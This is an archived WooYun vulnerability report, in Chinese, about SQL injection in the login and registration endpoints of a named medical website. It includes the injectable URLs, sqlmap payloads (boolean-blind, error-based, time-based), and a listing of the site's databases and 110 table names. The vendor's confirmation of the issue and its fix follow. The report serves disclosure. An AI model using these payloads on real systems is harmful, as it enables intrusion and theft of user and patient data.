乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-19: 细节已通知厂商并且等待厂商处理中 2015-04-20: 厂商已经确认,细节仅向厂商公开 2015-04-30: 细节向核心白帽子及相关领域专家公开 2015-05-10: 细节向普通白帽子公开 2015-05-20: 细节向实习白帽子公开 2015-06-04: 细节向公众公开
23
get数据出去。太不安全了。
http://endop.medlive.cn/ac-usercenter/login.html?date=Fri%20Apr%2017%202015%2011:00:08%20GMT+0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23&password=23http://endop.medlive.cn/ac-usercenter/register.html?method=checkexist&submit_type=ajax&type=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(120)%2cCHAR(56)%2cCHAR(73)%2cCHAR(80)%2cCHAR(72)%2cCHAR(104)%2cCHAR(113)%2cCHAR(113))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&value=e
登陆处 参数username
注册处:参数type value
---Parameter: username (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: date=Fri Apr 17 2015 11:00:08 GMT 0800 (%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23' RLIKE (SELECT (CASE WHEN (7770=7770) THEN 23 ELSE 0x28 END)) AND 'FtVh'='FtVh&password=23 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: date=Fri Apr 17 2015 11:00:08 GMT 0800 (%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23' AND (SELECT 7910 FROM(SELECT COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(7910=7910,1))),0x7170627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xjTj'='xjTj&password=23 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: date=Fri Apr 17 2015 11:00:08 GMT 0800 (%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23' AND (SELECT * FROM (SELECT(SLEEP(5)))vfAJ) AND 'VrTy'='VrTy&password=23---web application technology: Apache 2.2.14back-end DBMS: MySQL 5.0available databases [3]:[*] endu[*] endu_patient[*] information_schemaDatabase: endu[110 tables]+--------------------------+| cms_admin || cms_admin_role || cms_admin_role_priv || cms_ads_1109 || cms_ads_1110 || cms_area || cms_attachment || cms_author || cms_block || cms_c_activity || cms_c_case || cms_c_experts || cms_c_ku6video || cms_c_patients || cms_c_read || cms_c_wenxian || cms_c_zhuanqu || cms_cache_count || cms_category || cms_collect || cms_content || cms_content_count || cms_content_position || cms_content_tag || cms_copyfrom || cms_datasource || cms_editor_data || cms_endu_baidu || cms_endu_mycomments || cms_endu_myconsult || cms_endu_mydownload || cms_endu_mypolls || cms_endu_mytopics || cms_endu_qq || cms_endu_qq_session || cms_endu_renren || cms_endu_sina || cms_error_report || cms_hits || cms_ipbanned || cms_keylink || cms_keyword || cms_linkage || cms_log || cms_member || cms_member_cache || cms_member_casedoc || cms_member_company || cms_member_detail || cms_member_doctor || cms_member_expert || cms_member_group || cms_member_group_extend || cms_member_group_priv || cms_member_info || cms_member_oa || cms_menu || cms_model || cms_model_field || cms_module || cms_player || cms_position || cms_process || cms_process_status || cms_role || cms_search || cms_search_type || cms_session || cms_space || cms_space_api || cms_status || cms_times || cms_type || cms_urlrule || cms_video || cms_video_count || cms_video_data || cms_video_position || cms_video_special || cms_video_special_list || cms_video_tag || cms_vote_useroption || cms_workflow || download_file_count || group_category || group_forum || group_info || group_info_ext_category || group_join_queue || group_member || group_private_topic || group_private_topic_post || group_topic || group_topic_copy || group_topic_post || group_topic_post_copy || upload_file || v_list_activity || v_list_case || v_list_experts || v_list_group || v_list_patients || v_list_read || v_list_zhuanqu || v_show_case || v_show_experts || v_show_patients || v_show_read || v_show_zhuanqu || v_user_info |+--------------------------+
紧急修复!
危害等级:高
漏洞Rank:20
确认时间:2015-04-20 09:07
我们紧急修复中
暂无